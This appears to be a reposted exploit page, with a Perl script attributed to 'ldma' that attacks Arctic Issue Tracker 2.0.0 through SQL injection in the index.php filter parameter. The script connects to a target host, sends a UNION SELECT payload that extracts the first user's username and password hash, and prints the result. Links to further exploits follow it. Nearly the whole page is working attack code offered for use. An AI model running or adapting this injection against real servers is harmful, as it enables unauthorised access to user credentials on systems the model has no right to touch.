Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

摘要：#!/usr/bin/perluseIO::Socket;printq{----------------------------------...

#!/usr/bin/perluse IO::Socket;

print q{

-----------------------------------------------

Arctic Issue Tracker v2.0.0 exploit by ldma

~ SubCode ~

use: arctic.pl [server] [dir]

sample:

$perl arctic.pl localhost /arctic/

-----------------------------------------------};$webpage = $ARGV[0];

$directory = $ARGV[1];

print " -initiatingn";

print "|--modules..OK!n";

sleep 1;

print "|--premodules..OK!n";

sleep 1;

print "|--preprocessors..OK!n";

sleep 1;

print " -opening channel.. OK!n";

sleep 2;

print "--------------------------------------------n";

print "~ configuration complete.. OK!n";

print "~ scanning";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

if (!$webpage) { die " rtfm geekn"; }$wbb_dir =

"".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--";print "~ connecting";

$|=1;

foreach (1..1) {

print ".";

sleep 1;

}

print " OK!n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Servern";print "~ open exploiting-tree";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

print $sock "GET $wbb_dir HTTP/1.1n";

print $sock "Accept: */*n";

print $sock "User-Agent: Hackern";

print $sock "Host: $webpagen";

print $sock "Connection: closenn";

print "[ ] Target: $webpagen";

while ($answer = ) {

if ($answer =~ /Current Filter: (.*)/) {

print "exploiting in progress";

$|=1;

foreach (1..3) {

print "...";

sleep 1;

}

print "OK!n[ ] vuln: OK!nnnwell done, ldma!nn";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

print "[ ] USER-ID: -1n";

print "[ ] ID-HASH: $1n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

exit();

}

}close($sock);# ldma

【Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit】相关文章：

★ IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

★ WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

★ Apache Web服务器安全设置注意事项

★ php挖洞基础知识篇以及防范方法

★ CoolPlayer m3u File Local Buffer Overflow Exploit

★ MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

★ 如何处理ARP的攻击技巧

★ Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

上一篇： MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

下一篇： Mcafee scan 自动停止的修复方法

学习工具